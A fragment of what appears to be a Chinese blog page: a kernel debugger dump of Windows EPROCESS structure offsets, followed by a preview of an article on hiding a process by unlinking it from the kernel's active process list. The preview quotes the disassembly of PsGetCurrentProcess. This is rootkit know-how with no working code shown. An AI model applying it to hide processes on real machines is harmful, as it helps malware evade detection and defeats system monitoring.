   +0x228 DefaultIoPriority : Pos 27, 3 Bits
   +0x228 SparePsFlags1    : Pos 30, 2 Bits
   +0x22c ExitStatus       : Int4B
   +0x230 Spare7           : Uint2B
   +0x232 SubSystemMinorVersion : UChar
   +0x233 SubSystemMajorVersion : UChar
   +0x232 SubSystemVersion : Uint2B
   +0x234 PriorityClass    : UChar
   +0x238 VadRoot          : _MM_AVL_TABLE
   +0x258 Cookie           : Uint4B
   +0x25c AlpcContext      : _ALPC_PROCESS_CONTEXT

Puzz1e

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
修改活动进程链隐藏进程

如何修改活动进程链来隐藏进程？通过PsGetCurrentProcess函数可以获取当前线程的EPROCESS，反汇编这个函数的话可以看到这个内核函数只有三行：mov eax, fs:0x00000124;mov eax, [eax + 0x44];retWindows中有一个叫Kernel's Processor Control Block (KPRCB)，核心处理控制块的结
复制链接

扫一扫